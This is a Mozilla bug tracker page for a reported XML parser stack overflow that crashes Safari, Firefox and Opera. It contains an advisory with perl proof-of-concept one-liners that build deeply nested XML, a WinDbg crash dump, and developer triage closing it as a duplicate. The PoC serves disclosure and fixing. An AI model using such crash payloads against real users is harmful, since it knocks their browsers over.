Closed Bug 547226 Opened 15 years ago Closed 15 years ago

Apple Safari, Mozilla Firefox and Opera browser Remote Denial of Service

Categories

(Core :: Layout, defect)

Product:
Core
Component:
Layout
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 485941

People

(Reporter: advisories, Unassigned)

Details

(Keywords: testcase, Whiteboard: [sg:dos] stack-overflow)

Attachments

(2 files)

PoC
117.19 KB, text/xml
Details
PoC 2
117.24 KB, text/xml
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) Build Identifier: Mozilla Firefox 3.6 III. DESCRIPTION ------------------------- The XML parser of the browsers Safari, Firefox and Opera are affected by a Stack Exhaustion (Stack Overflow) due to incorrect handling of XML files, resulting in a remote denial of service, crashing the affected users browser. IV. PROOF OF CONCEPT ------------------------- $ perl -e 'print "<?xml version = \"1.0\"?><root><element>" . "<x>y"x30000 . "</element></root>"' > poc.xml or simply: $ perl -e 'print "<x>y"x30000' > poc.xml (Opera crashes at ~7K, Safari at ~9K and Firefox at ~30K) [...] + Firefox 3.6 on Windows XP SP2: (dfc.f14): Stack overflow - code c00000fd (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0332e348 ecx=054d0550 edx=036ee700 esi=00000000 edi=0332e348 eip=100f1338 esp=00033000 ebp=00000000 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Archivos de programa\Mozilla Firefox\xul.dll - xul!NS_Realloc_P+0x3f68: 100f1338 56 push esi Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:000> !analyze -v (...) FAULTING_IP: xul!NS_Realloc_P+3f68 100f1338 56 push esi EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 100f1338 (xul!NS_Realloc_P+0x00003f68) ExceptionCode: c00000fd (Stack overflow) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 00032ffc FAULTING_THREAD: 00000f14 PROCESS_NAME: firefox.exe ADDITIONAL_DEBUG_TEXT: Use '!findthebuild' command to search for the target build information. If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols. MODULE_NAME: xul FAULTING_MODULE: 7c910000 ntdll DEBUG_FLR_IMAGE_TIMESTAMP: 4b5101ce ERROR_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva p gina de seguridad para la pila. EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva p gina de seguridad para la pila. EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 00032ffc DEFAULT_BUCKET_ID: STACK_OVERFLOW PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_WRONG_SYMBOLS LAST_CONTROL_TRANSFER: from 00000000 to 100f1338 TACK_TEXT: 00000000 00000000 00000000 00000000 00000000 xul!NS_Realloc_P+0x3f68 (...) [...] V. BUSINESS IMPACT ------------------------- Attackers can use this vulnerability to cause a remote denial of service to end users. Reproducible: Always Actual Results: DoS web browser VI. SYSTEMS AFFECTED ------------------------- Tested latest verion of each product, others may be affected: Apple Safari 4.0.4 Mozilla Firefox 3.6 Opera 10.10
Attached file PoC
PoC per comment 0.
Attached file PoC 2
Other PoC from comment 0.
This would be [sg:dos] anyway, but I can't confirm the crash. Both testcases give me a XML parser error, so I'm not even getting to the stack exhaustion part. I'm going to unhide this as we have a number of similar bugs such as bug 485941.
Group: core-security
Component: General → XUL
Keywords: testcase
Product: Firefox → Core
QA Contact: general → xptoolkit.widgets
Whiteboard: [sg:dos] stack-overflow
Isn't this just a duplicate of bug 485941? Reed, why did you move this to XUL? There's no XUL involved here (other than libxul, which is just the layout/dom/etc library).
(In reply to comment #4) > Isn't this just a duplicate of bug 485941? If it is, please feel free to mark it as such. > Reed, why did you move this to XUL? There's no XUL involved here (other than > libxul, which is just the layout/dom/etc library). My apologies. I assume the correct component would be Core :: Layout then?
Yeah.
Status: UNCONFIRMED → RESOLVED
Closed: 15 years ago
Component: XUL → Layout
QA Contact: xptoolkit.widgets → layout
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: